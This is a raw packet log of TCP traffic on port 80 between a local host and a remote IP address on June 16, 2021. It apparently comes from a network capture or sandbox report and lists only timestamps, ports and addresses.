Jun 16, 2021 12:29:40.760922909 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.760948896 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760951042 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.760982037 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.760986090 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761013985 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761013985 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761049032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761049032 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761081934 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761082888 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761116028 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761116982 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761147022 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761148930 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761178970 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761181116 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761210918 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761214018 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761240959 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761260033 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761285067 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761288881 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761322021 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761322021 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761354923 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761356115 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761385918 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761388063 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761419058 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761423111 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761447906 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761451960 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761477947 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761481047 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761507988 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761508942 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761539936 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761542082 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761571884 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761574030 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761604071 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761605024 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761637926 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761639118 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761671066 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761672020 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761707067 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.761708975 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.761743069 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.766995907 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981158972 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981218100 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981255054 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981287003 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981317043 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981347084 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981363058 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981379032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981410980 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981422901 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981436014 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981442928 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981456041 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981486082 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981491089 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981522083 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981553078 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981555939 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981585026 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981590033 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981612921 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981626987 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981641054 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981657982 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981672049 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981688976 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981698990 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981720924 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981728077 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981751919 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981766939 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981782913 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981796980 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981815100 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981836081 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981843948 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981852055 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981873989 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981898069 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981903076 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981920958 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981933117 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981947899 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981964111 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.981975079 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.981992960 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982007980 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982022047 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982049942 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982049942 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982079983 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982086897 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982108116 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982124090 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982135057 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982152939 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982163906 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982192039 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982196093 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982219934 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982228041 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982249975 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982251883 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982276917 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982291937 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982307911 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982326031 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982345104 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982361078 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982382059 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982395887 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982412100 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982433081 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982445955 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982467890 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982484102 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982502937 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982537985 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982541084 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982573032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982573986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982605934 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982608080 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982637882 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982641935 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982672930 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982675076 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982708931 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982711077 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982734919 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982744932 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982767105 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982779026 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982800007 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982812881 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982821941 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982846022 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982850075 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982878923 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982909918 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982911110 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982923031 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982943058 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982969046 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.982975006 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.982992887 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983006954 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983020067 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983040094 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983047962 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983072996 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983079910 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983107090 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983135939 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983144045 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983167887 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983203888 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983216047 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983241081 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983252048 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983278036 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983282089 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983315945 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983325005 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983350992 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983374119 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983383894 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983405113 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983416080 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983438969 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983444929 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983463049 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983474016 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983489037 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983501911 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983529091 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983530045 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983556986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983558893 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983587980 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983588934 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983616114 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983624935 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983645916 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983650923 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983675957 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983695030 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983705044 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983721972 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983735085 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983747005 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983764887 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983788013 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983791113 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983814955 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983822107 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983840942 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983855009 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983865023 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983887911 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983901024 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983920097 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983932018 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983952045 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.983961105 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.983985901 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984008074 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984019041 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984040022 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984051943 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984070063 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984082937 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984095097 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984112978 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984133005 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984143972 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984165907 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984175920 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984194040 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984203100 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984230042 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984230995 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984256983 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984261990 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984287024 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984292030 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984313965 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984319925 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984344959 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984349012 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984369993 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984380007 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984402895 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984407902 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984419107 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984436035 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984438896 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984464884 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984489918 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984492064 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984520912 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984524012 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984543085 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984553099 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984572887 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984585047 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984601974 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984618902 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984647989 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984648943 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984664917 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984682083 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.984689951 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.984721899 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.985938072 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.985970974 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986015081 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986033916 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986047983 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986062050 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986083984 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986090899 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986114979 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986124992 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986146927 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986148119 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986180067 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986202002 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986207962 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986229897 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986241102 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986263990 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986268044 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986296892 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986304998 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986325026 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986339092 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986352921 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986366034 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986382961 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986408949 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986409903 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986438990 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986442089 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986463070 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986468077 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986495972 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986499071 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986532927 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986536026 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986562967 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986571074 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986593008 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986604929 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:40.986623049 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.986663103 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:40.989031076 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007014990 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007071018 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007101059 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007186890 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007220030 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007224083 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007251978 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007261038 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007265091 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007292032 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007292986 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007330894 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007334948 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007365942 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007369041 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007397890 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007402897 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007431984 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007441044 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007466078 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007469893 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007502079 CEST	49167	80	192.168.2.22	103.89.90.94
Jun 16, 2021 12:29:41.007502079 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007538080 CEST	80	49167	103.89.90.94	192.168.2.22
Jun 16, 2021 12:29:41.007538080 CEST	49167	80	192.168.2.22	103.89.90.94
